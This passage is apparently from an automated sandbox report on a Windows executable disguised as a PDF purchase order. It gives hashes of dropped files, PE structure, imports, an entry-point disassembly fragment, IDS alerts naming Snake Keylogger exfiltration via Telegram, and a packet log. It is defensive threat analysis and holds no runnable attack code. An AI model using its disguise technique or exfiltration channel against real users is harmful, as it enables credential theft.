| Reputation: | low |
| Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\fyldebtten.soi
Download File
| Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 210366 |
| Entropy (8bit): | 1.240975322465592 |
| Encrypted: | false |
| SSDEEP: | 768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA |
| MD5: | AEF78D8D561E8802286A78AAC6C73ED6 |
| SHA1: | DDF5DA649482D0A553802827BB9F0EF64A7069E1 |
| SHA-256: | 45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE |
| SHA-512: | 93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199 |
| Malicious: | false |
| Reputation: | low |
| Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Verminly\wildwestfilm.sto
Download File
| Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 363811 |
| Entropy (8bit): | 1.2512349423386382 |
| Encrypted: | false |
| SSDEEP: | 768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq |
| MD5: | BFEA15C03AB295424981A73637A19491 |
| SHA1: | A5ADABDDC373D6B3004F96946D84B651E42D9F5C |
| SHA-256: | 83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B |
| SHA-512: | CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 11776 |
| Entropy (8bit): | 5.655335921632966 |
| Encrypted: | false |
| SSDEEP: | 192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9 |
| MD5: | EE260C45E97B62A5E42F17460D406068 |
| SHA1: | DF35F6300A03C4D3D3BD69752574426296B78695 |
| SHA-256: | E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27 |
| SHA-512: | A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3 |
| Malicious: | false |
| Antivirus: |
|
| Joe Sandbox View: |
|
| Preview: |
| Process: | C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1180 |
| Entropy (8bit): | 3.2746695656782077 |
| Encrypted: | false |
| SSDEEP: | 12:8wl0+sXU1e/tz0/CSL6/cBnwgXl341DEDeG41DEDWBQ1olfW+kjcmAaxCalCNfBh:8FvWLrFPjPKmizZMxnkjqy |
| MD5: | 823719C88FF1294851DE589A3B80552F |
| SHA1: | D49CE16897A1B57A73E4A035925757D49ECD619B |
| SHA-256: | 0228C01257EEAEDA4C18F9C02C68F8EFA1A0A1C03A2E264733D162D6570B599B |
| SHA-512: | 34A74AE2912256C7CE80805A2548A758A99BC2C098E417FF11B286451F998374184811819979E83FDF08DC3E592A76D1981293501A96909FCC86EE79B628710F |
| Malicious: | false |
| Preview: |
| File type: | |
| Entropy (8bit): | 7.963673421473499 |
| TrID: |
|
| File name: | PURCHASE ORDER TRC-090971819130-24_pdf.exe |
| File size: | 477'600 bytes |
| MD5: | 745504717878bb22b600df7e2c2dd9f4 |
| SHA1: | 9515d0277803511a4f401674f40f022ed69c85d7 |
| SHA256: | 8a4d38092e7f0245aa376d724cf3dbe08d4b563a86db3c99e70defaa38beb969 |
| SHA512: | 8035ff6f18deaaec620acd824bbcecf07d38f2e2f77e322942f635320af75bbc4bd60250f0e61094eed22cfeef652791d61476bd7b4c613ebb6fb7952ae48e4d |
| SSDEEP: | 12288:I5AlMIL/obq71R7Oj6rgcPIcXuQd7lxu7Jj1JK8s5FEeKN:ZtL/o2BR7Zrgcwgpxu7Jj1Jiceg |
| TLSH: | 36A42301A510D743D16114764C326FAEBAADB768DAA52F07278C2D053F336A2CD2FD9A |
| File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d......... |
 | |
| Icon Hash: | 3d2e0f95332b3399 |
| Entrypoint: | 0x4032a0 |
| Entrypoint Section: | .text |
| Digitally signed: | false |
| Imagebase: | 0x400000 |
| Subsystem: | windows gui |
| Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
| DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
| Time Stamp: | 0x567F847F [Sun Dec 27 06:26:07 2015 UTC] |
| TLS Callbacks: | |
| CLR (.Net) Version: | |
| OS Version Major: | 4 |
| OS Version Minor: | 0 |
| File Version Major: | 4 |
| File Version Minor: | 0 |
| Subsystem Version Major: | 4 |
| Subsystem Version Minor: | 0 |
| Import Hash: | d4b94e8ee3f620a89d114b9da4b31873 |
| Instruction |
|---|
| sub esp, 000002D4h |
| push ebp |
| push esi |
| push 00000020h |
| xor ebp, ebp |
| pop esi |
| mov dword ptr [esp+0Ch], ebp |
| push 00008001h |
| mov dword ptr [esp+0Ch], 0040A300h |
| mov dword ptr [esp+18h], ebp |
| call dword ptr [004080B0h] |
| call dword ptr [004080ACh] |
| cmp ax, 00000006h |
| je 00007F00C4EFBE53h |
| push ebp |
| call 00007F00C4EFEF96h |
| cmp eax, ebp |
| je 00007F00C4EFBE49h |
| push 00000C00h |
| call eax |
| push ebx |
| push edi |
| push 0040A2F4h |
| call 00007F00C4EFEF13h |
| push 0040A2ECh |
| call 00007F00C4EFEF09h |
| push 0040A2E0h |
| call 00007F00C4EFEEFFh |
| push 00000009h |
| call 00007F00C4EFEF64h |
| push 00000007h |
| call 00007F00C4EFEF5Dh |
| mov dword ptr [00434F04h], eax |
| call dword ptr [00408044h] |
| push ebp |
| call dword ptr [004082A8h] |
| mov dword ptr [00434FB8h], eax |
| push ebp |
| lea eax, dword ptr [esp+34h] |
| push 000002B4h |
| push eax |
| push ebp |
| push 0042B228h |
| call dword ptr [0040818Ch] |
| push 0040A2C8h |
| push 00433F00h |
| call 00007F00C4EFEB4Ah |
| call dword ptr [004080A8h] |
| mov ebx, 0043F000h |
| push eax |
| push ebx |
| call 00007F00C4EFEB38h |
| push ebp |
| call dword ptr [00408178h] |
| Programming Language: |
|
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x85c8 | 0xa0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5d000 | 0x11e0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x637c | 0x6400 | 83ff228d6dae8dd738eb2f78afbc793f | False | 0.672421875 | data | 6.491609540807675 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x147c | 0x1600 | d9f9b0b330e238260616b62a7a3cac09 | False | 0.42933238636363635 | data | 4.973928345594701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x2aff8 | 0x600 | 3f2b05c8fbb8b2e4c9c89e93d30e7252 | False | 0.53125 | data | 4.133631086111171 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x35000 | 0x28000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x5d000 | 0x11e0 | 0x1200 | 20639f4e7c421f5379e2fb9ea4a1530d | False | 0.3684895833333333 | data | 4.485045860065118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_BITMAP | 0x5d268 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174 |
| RT_ICON | 0x5d5d0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894 |
| RT_DIALOG | 0x5d8b8 | 0x144 | data | English | United States | 0.5216049382716049 |
| RT_DIALOG | 0x5da00 | 0x13c | data | English | United States | 0.5506329113924051 |
| RT_DIALOG | 0x5db40 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x5dc40 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x5dd60 | 0xc4 | data | English | United States | 0.5918367346938775 |
| RT_DIALOG | 0x5de28 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x5de88 | 0x14 | data | English | United States | 1.2 |
| RT_MANIFEST | 0x5dea0 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447 |
| DLL | Import |
|---|---|
| KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
| USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
| ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States |  |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-19T15:29:23.912768+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49713 | 216.58.208.238 | 443 | TCP |
| 2024-12-19T15:29:31.912821+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49733 | 132.226.247.73 | 80 | TCP |
| 2024-12-19T15:29:40.006658+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49733 | 132.226.247.73 | 80 | TCP |
| 2024-12-19T15:29:42.161159+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49756 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:29:43.850430+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49761 | 132.226.247.73 | 80 | TCP |
| 2024-12-19T15:29:45.902560+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49766 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:29:49.397276+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49776 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:29:52.938425+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49785 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:29:56.563595+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49796 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:00.031933+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49806 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:08.989401+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49827 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:21.477445+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49859 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:25.990535+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49871 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:30.719693+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49883 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:34.215299+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49893 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:37.686699+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49904 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:42.399185+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49917 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:45.840863+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49925 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:50.316155+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49937 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:53.779170+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49947 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:30:57.250331+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49955 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:31:01.789509+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49967 | 149.154.167.220 | 443 | TCP |
| 2024-12-19T15:31:07.086493+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49979 | 149.154.167.220 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 19, 2024 15:29:21.088032007 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:21.088099003 CET | 443 | 49713 | 216.58.208.238 | 192.168.2.5 |
| Dec 19, 2024 15:29:21.088181973 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:21.100100040 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:21.100136042 CET | 443 | 49713 | 216.58.208.238 | 192.168.2.5 |
| Dec 19, 2024 15:29:22.800245047 CET | 443 | 49713 | 216.58.208.238 | 192.168.2.5 |
| Dec 19, 2024 15:29:22.800381899 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:22.801332951 CET | 443 | 49713 | 216.58.208.238 | 192.168.2.5 |
| Dec 19, 2024 15:29:22.801399946 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:23.193308115 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:23.193345070 CET | 443 | 49713 | 216.58.208.238 | 192.168.2.5 |
| Dec 19, 2024 15:29:23.194279909 CET | 443 | 49713 | 216.58.208.238 | 192.168.2.5 |
| Dec 19, 2024 15:29:23.194359064 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:23.197119951 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:23.239351988 CET | 443 | 49713 | 216.58.208.238 | 192.168.2.5 |
| Dec 19, 2024 15:29:23.912681103 CET | 443 | 49713 | 216.58.208.238 | 192.168.2.5 |
| Dec 19, 2024 15:29:23.912779093 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:23.912844896 CET | 443 | 49713 | 216.58.208.238 | 192.168.2.5 |
| Dec 19, 2024 15:29:23.913000107 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:23.913325071 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:23.913641930 CET | 443 | 49713 | 216.58.208.238 | 192.168.2.5 |
| Dec 19, 2024 15:29:23.913741112 CET | 49713 | 443 | 192.168.2.5 | 216.58.208.238 |
| Dec 19, 2024 15:29:24.071151972 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:24.071198940 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:24.071355104 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:24.072251081 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:24.072271109 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:25.777048111 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:25.777350903 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:25.789834023 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:25.789859056 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:25.790260077 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:25.793988943 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:25.794358969 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:25.839334011 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:28.842921019 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:28.843133926 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:28.857830048 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:28.857903957 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:28.962193012 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:28.962285995 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:28.966309071 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:28.966373920 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:28.966399908 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:28.966449976 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.042085886 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.042148113 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.044363976 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.044480085 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.051840067 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.051897049 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.052023888 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.052078009 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.059536934 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.059593916 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.061644077 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.061703920 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.069499016 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.069560051 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.070815086 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.070872068 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.078130960 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.078192949 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.079368114 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.079423904 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.087240934 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.087321997 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.090466976 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.090532064 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.092163086 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.092216015 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.103768110 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.103822947 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.106482983 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.106703043 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.117527962 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.117583990 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.120085955 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.120135069 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.131731033 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.131795883 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.134311914 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.134375095 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.144804955 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.144876957 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.147535086 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.147588015 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.161947012 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.162007093 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.162374020 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.162516117 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.171904087 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.172050953 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.190397024 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.190565109 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.221040964 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.221204996 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
| Dec 19, 2024 15:29:29.233944893 CET | 443 | 49720 | 172.217.17.65 | 192.168.2.5 |
| Dec 19, 2024 15:29:29.234107971 CET | 49720 | 443 | 192.168.2.5 | 172.217.17.65 |
